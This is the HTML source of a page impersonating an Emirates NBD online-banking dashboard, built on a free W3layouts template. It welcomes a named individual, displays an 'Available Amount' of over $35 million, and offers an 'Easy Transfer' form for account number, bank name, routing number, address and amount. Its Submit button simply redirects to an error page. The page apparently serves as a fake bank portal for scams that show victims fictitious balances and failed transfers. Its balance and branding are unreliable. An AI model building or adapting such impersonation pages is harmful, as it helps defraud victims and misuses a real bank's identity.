
<!--
Author: W3layouts
Author URL: http://w3layouts.com
License: Creative Commons Attribution 3.0 Unported
License URL: http://creativecommons.org/licenses/by/3.0/
-->
<!DOCTYPE html>
<html lang="en">
<head>
<title>Emirate NBD Banking  |Dashboard </title>
<meta name="viewport" content="width=device-width, initial-scale=1">
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="keywords" content="E-Banking Responsive web template, Bootstrap Web Templates, Flat Web Templates, Android Compatible web template, 
	SmartPhone Compatible web template, free WebDesigns for Nokia, Samsung, LG, Sony Ericsson, Motorola web design" />
<script type="application/x-javascript"> addEventListener("load", function() { setTimeout(hideURLbar, 0); }, false); function hideURLbar(){ window.scrollTo(0,1); } </script>
<!-- Custom Theme files -->
<link href="css/bootstrap.css" type="text/css" rel="stylesheet" media="all">
<link href="css/style.css" type="text/css" rel="stylesheet" media="all">
<link href="css/font-awesome.css" rel="stylesheet">   <!-- font-awesome icons --> 
<!-- //Custom Theme files -->  
<!-- js --> 
	<script src="js/jquery-2.2.3.min.js"></script>
<!-- web-fonts -->
<link href="//fonts.googleapis.com/css?family=Secular+One" rel="stylesheet">
<link href="//fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i" rel="stylesheet">
<link href="//fonts.googleapis.com/css?family=Raleway:100,100i,200,200i,300,300i,400,400i,500,500i,600,600i,700,700i,800,800i,900,900i" rel="stylesheet">
<!-- //web-fonts --> 
</head>
<body> 
	<!-- header -->
	<div class="headerw3-agile"> 
		<div class="header-w3mdl"><!-- header-two --> 
			<div class="container"> 
				<div class="agileits-logo navbar-left">
					<h1><a href="#"><img src="images/w.jpg" alt="logo"/>WELCOME TO EMIRATES ONLINE BANKING</a></h1>
				</ul>
					</div>  

				</div>
				<div class="clearfix"> </div> 
			</div>	
		</div>	
	</div>	
	<!-- //header -->  
	<!-- banner -->
	<div class="banner">
		<div class="header-nav"><!-- header-three --> 	
			<nav class="navbar navbar-default">
				<div class="navbar-header">
					<button type="button" class="navbar-toggle" data-toggle="collapse" data-target="#bs-example-navbar-collapse-1">
						<span class="sr-only">Toggle navigation</span>
						Menu 
					</button> 
				</div>
				<!-- top-nav -->
				<div class="collapse navbar-collapse" id="bs-example-navbar-collapse-1">
					<ul class="nav navbar-nav">
						<li><a href="dashboard.html" class="active">Dashoard</a></li>
						<li><a href="transfer.html" class="scroll">Transfer</a></li>    
						<li><a href="erro.html" class="scroll">Pay Bills</a></li>       
						<li><a href="home.html" data-toggle="scroll">Available Amount $35,440,460.02</a></li>
							</li>
							
						</li>	
						
					</ul>  
					<div class="clearfix"> </div>	
				</div>
			</nav>    
		</div>
		<!-- banner-text -->
		<!-- banner -->
		<div class="container">
			<div class="banner-text agileits-w3layouts">
				<div  id="top" class="callbacks_container">
					<ul class="rslides" id="slider3">
						<li>
							<div class="banner-textagileinfo">
								<h6>Welcome David Carol VanAllen</h6>	 
								<h3>Secure and convenient banking</h3>	 
								<h3>Fast convenient and useful
banking services on the go.</h3> 
				    
    <!-- text - 1 column starts-->
    <div class="container-page application-forms inner box-white">
      <div class="pure-g site">
             
     <form method="post" action="http://your.domain/cgi-bin/FormMail.pl">
         
            <div class="input-container">
              <div class="pure-u-sm-12-24 pure-u-md-12-24">
                <label>
            
                
                     <h1>		                
	                  EASY TRANSFER
	                  </h1>
                </label>
              </div>
              <div class="pure-u-sm-10-24 pure-u-md-10-24">
                <label>
                <h3 style="color:green;"></h3>
                </label>
              </div>
            </div>
           
           
           
           	<div class="input-container">             
              <div class="pure-u-sm-4-24">
                <label for="Title" class="text"> Title </label>
              </div>
             
                <span id="laTitle_" class=""></span> </div>
              <div class="pure-u-sm-1-24"> </div>
              <div class="pure-u-sm-4-24">
                <label for="laName" class="text"> Account Number <span class="">*</span> </label>
              </div>
              <div class="pure-u-sm-7-24">
                <input class="pure-input-1  validate" name="laName" id="laName" autocomplete="off"  maxlength="100" type="text" placeholder="Account Number" value="" onkeypress="return isSpeKey(event)">
            </div>
            <div class="input-container">
              <div class="pure-u-sm-4-24">
                <label for="laEmail" class="text"> Bank Name <span class="">*</span> </label>
              </div>
              <div class="pure-u-sm-7-24">
                <div class="pure-u-sm-24-24">
                  <input type="text" placeholder="Bank Name" name="laEmail" id="laEmail" autocomplete="off"  maxlength="90" class="pure-input-1" value=""   onkeypress="return isSpKeyEmail(event)"><span id="laEmail_" class=""></span>
                </div>
                
              </div>
              <div class="pure-u-sm-1-24"> </div>
              <div class="pure-u-sm-4-24">
                <label for="laMobileCode" class="text"> Routine Number <span class="">*</span> </label>
              </div>            
              <div class="pure-u-sm-7-24">                 
                <input class="pure-input-1  validate" maxlength="15" id="laMobilenum" autocomplete="off"  placeholder=" Routine Number" type="text" name="laMobilenum" value="" onkeypress="return isNumberKey(event)" style="width:84%;">  <span id="laMobilenum_" class=""></span>              
                 </div>
              <div class="pure-u-sm-1-24"> </div>
              <div class="pure-u-sm-4-24">
                <label for="laMobileCode" class="text"> Bank Address <span class="">*</span> </label>
              </div>            
              <div class="pure-u-sm-7-24">                 
                <input class="pure-input-1  validate" maxlength="15" id="laMobilenum" autocomplete="off"  placeholder="Bank Address" type="text" name="laMobilenum" value="" onkeypress="return isNumberKey(event)" style="width:84%;">  <span id="laMobilenum_" class=""></span>              
               
              </div>
              <div class="pure-u-sm-8-24 "> </div>
              <div class="pure-u-sm-3-24">;</div>
              <div class="pure-u-sm-8-24 "> </div>
            </div>
				  
	     <div class="pure-u-sm-4-24">
                <label for="laNationalid" class="text"> $Amount <span class="">*</span> </label>
              </div>
				
              <div class="pure-u-sm-7-24">
                <div class="pure-u-sm-24-24">
                  <input class="pure-input-1 validate" maxlength="30" name="laNationalid" autocomplete="off"  id="laNationalid" type="text" placeholder="Amount" value="" onkeypress="return isSpKey2(event)">
					
                </div>
                <div class="pure-u-sm-24-24"> <span id="laNationalid_" class=""></span> </div>
              </div>  
            <div class="input-container">
              <div class="pure-u-sm-4-24">
                
              </div>
              
              <div class="pure-u-sm-7-24">
                <div class="pure-u-sm-24-24"> 
                </div>
                <div class="pure-u-sm-24-24 captcha"> 
                  
		
              </div>
            </div>
            	
            <div class="input-container">
              <div class="pure-u-sm-4-24"> </div>
              <div class="pure-u-sm-7-24"> </div>
              <div class="pure-u-sm-1-24"></div>
              <div class="pure-u-sm-4-24"> </div>
              <div class="pure-u-sm-7-24"> <span id="scaptcha" class=""></span>
                <input type="hidden" name="FIR" value="FIR">               
                
                <button onclick="location.href = 'erro.html';" id="myButton" class="float-left submit-button"> Submit </button>				
							</div>	
						</li> 
					</ul>
				</div>
			</div>
		 </div>
	</div>
	<!-- about -->
								</div>
							</div>
						</div>
					</div> 
				</div> 
				<div class="clearfix"> </div>
			</div>		
		</div>	
			<!-- //about-bottom -->
			<!-- about-bottom-grid -->
			<div class="wthree-about-bot-grid-sec">
				<div class="agileits-about-pos">
					<h2>secure banking</h2>
				</div>
				<div class="col-md-6 col-sm-6 w3ls-abg w3ls-abg1 abg1">
					<h4></h4>
					<p></p>
				</div>
				<div class="col-md-6 col-sm-6 w3ls-abg w3ls-abg2 abg4">
					<h4>it’s your money. manage it your way.</h4>
					<p></p>
				</div>
				<div class="col-md-6  col-sm-6 w3ls-abg w3ls-abg1 abg2">
					<h4>Pay people. Pay bills.Transfer money.</h4>
					<p>Perform All Your Transactions Right directly from your Browser.</p>
				</div>
				<div class="col-md-6 col-sm-6 w3ls-abg w3ls-abg2 abg3">
					<h4>Mobile Privacy and Security</h4>
					<p>End to End Encryption that protects you from fraud.</p>
				</div>
				
				<div class="clearfix"> </div>
			</div>
			<!-- //about-bottom-grid-->
	</div>
	<!-- //about -->
	<!--services-->
	<div class="w3ls-section services">
		<div class="container">
			<div class="services-left">
				<h4 class="title">online banking</h4>
				<h5>any time,anywhere.</h5>
				<p class="data">everywhere in the World</p>
				<div class="more">
					<a href="#" data-toggle="modal" data-target="#myModal"> Read More</a>
				</div>
			</div>
			<div class="services-right">
				<div class="services-grid">
					<div class="col-md-2 col-sm-2 col-xs-2 sr-icon">
						<span class="fa fa-lock" aria-hidden="true"></span>
					</div>	
					<div class="col-md-10 col-sm-10 col-xs-10 sr-txt">
						<h5>safe & secure</h5>
						<p>Itaque earum rerum hic a sapiente delectus</p>
					</div>	
					<div class="clearfix"></div>
				</div>
				<div class="services-grid">
					<div class="col-md-2 col-sm-2 col-xs-2 sr-icon">
						<span class="fa fa-clock-o" aria-hidden="true"></span>
					</div>	
					<div class="col-md-10 col-sm-10 col-xs-10 sr-txt">
						<h5>save time</h5>
						<p>Perform fast transactions</p>
					</div>	
					<div class="clearfix"></div>
				</div>
				<div class="services-grid">
					<div class="col-md-2 col-sm-2 col-xs-2 sr-icon">
						<span class="fa fa-gg" aria-hidden="true"></span>
					</div>	
					<div class="col-md-10 col-sm-10 col-xs-10 sr-txt">	
						<h5>transfer money</h5>
						<p>To local Banks And International Banks</p>
					</div>
					<div class="clearfix"></div>
				</div>	
				<div class="services-grid">
					<div class="col-md-2 col-sm-2 col-xs-2 sr-icon">
						<span class="fa fa-credit-card-alt" aria-hidden="true"></span>
					</div>	
					<div class="col-md-10 col-sm-10 col-xs-10 sr-txt">	
						<h5>pay bills</h5>
						<p>Pay for all your bills directly from your mobile</p>
					</div>	
					<div class="clearfix"> </div>
				</div>
				<div class="services-grid">
					<div class="col-md-2 col-sm-2 col-xs-2 sr-icon">
						<span class="fa fa-shopping-cart" aria-hidden="true"></span>
					</div>	
					<div class="col-md-10 col-sm-10 col-xs-10 sr-txt">
						<h5>Shop Online</h5>
						<p>Shop things online and get free 100 credits to buy more</p>
					</div>	
					<div class="clearfix"> </div>
				</div>
				<div class="clearfix"> </div>
			</div>
			<div class="clearfix"> </div>
		</div>
	</div>
	<!--//services-->
	
							<div class="clearfix"> </div>
						</div>
					</div>
					<div class="clearfix"> </div>
				</div>
			</div>
			<div class="clearfix"> </div>
		</div>
	</div>
</div>
<!-- //testimonials -->
<!--footer-->

     </div>
</div>	 
<div class="w3_agile-copyright text-center">
		<p>© 2019 Emirates Online-Banking. All rights reserved | Design by <a href="//w3layouts.com/">W3layouts</a></p>
	</div>
<!--//footer-->	

	<!-- modal-sign -->
	<div class="modal bnr-modal fade" id="myModal" tabindex="-1" role="dialog">
		<div class="modal-dialog" role="document">
			<div class="modal-dialog modal-md">
			<div class="modal-content">
				<div class="modal-header">
					<button type="button" class="close" data-dismiss="modal" aria-hidden="true">&times;</button>
					<img src="images/logo.png" alt="logo"/>
				</div>
				<div class="modal-body">
					<img src="images/modal.jpg" class="img-responsive" alt="image">
					<p>Fusce et congue nibh, ut ullamcorper magna. Donec ac massa tincidunt, fringilla sapien vel, tempus massa. Vestibulum felis leo, tincidunt sit amet tristique accumsan. In vitae dapibus metus. Donec nec massa non nulla mattis aliquam egestas et mi.</p>
				</div>
			</div>
		</div>

		</div>
	</div>
	<!-- modal-sign -->
	<div class="modal bnr-modal fade" id="myModal1" tabindex="-1" role="dialog">
		<div class="modal-dialog" role="document">
			<div class="modal-content">
				<div class="modal-header">
					<img src="images/logo.png" alt="logo"/>
					<button type="button" class="close" data-dismiss="modal" aria-label="Close"><span aria-hidden="true">&times;</span></button>						
				</div> 
				<div class="modal-body modal-spa">
					<p>E-Banking's email newsletter provides subscribers with helpful articles on important issues in the banking industry, as well as news about events and more! To sign up for the newsletter, fill the below form.</p>
					<form class=" wthree-subsribe" action="#" method="post"> 
						<input type="text" name="name" placeholder="Your Name" required="">
						<input type="email" name="email" placeholder="your Email" required="">
						<input type="submit" value="SignUp"> 
						<div class="clearfix"></div>
					</form>
				</div> 
			</div>
		</div>
	</div>
	<!-- //modal-sign -->    
	<!-- //banner -->
		<!-- //banner-text -->  
	<!-- //banner -->
	<!-- banner Slider starts Here -->
	<script src="js/responsiveslides.min.js"></script>
	<script>
		// You can also use "$(window).load(function() {"
		$(function () {
		  // Slideshow 3
		  $("#slider3").responsiveSlides({
			auto:true,
			pager:false,
			nav: true,
			speed: 500,
			namespace: "callbacks",
			before: function () {
			  $('.events').append("<li>before event fired.</li>");
			},
			after: function () {
			  $('.events').append("<li>after event fired.</li>");
			}
		  });
	
		});
	</script>
	<script src="js/SmoothScroll.min.js"></script>
	<!-- smooth-scrolling-of-move-up -->
	<script type="text/javascript" src="js/move-top.js"></script>
	<script type="text/javascript" src="js/easing.js"></script>
	<script type="text/javascript">
		$(document).ready(function() {
			/*
			var defaults = {
				containerID: 'toTop', // fading element id
				containerHoverID: 'toTopHover', // fading element hover id
				scrollSpeed: 1200,
				easingType: 'linear' 
			};
			*/
			
			$().UItoTop({ easingType: 'easeOutQuart' });
			
		});
	</script>
	<!-- //smooth-scrolling-of-move-up -->  

	<!-- Bootstrap core JavaScript
    ================================================== -->
    <!-- Placed at the end of the document so the pages load faster -->
    <script src="js/bootstrap.js"></script>

</body>
</html>
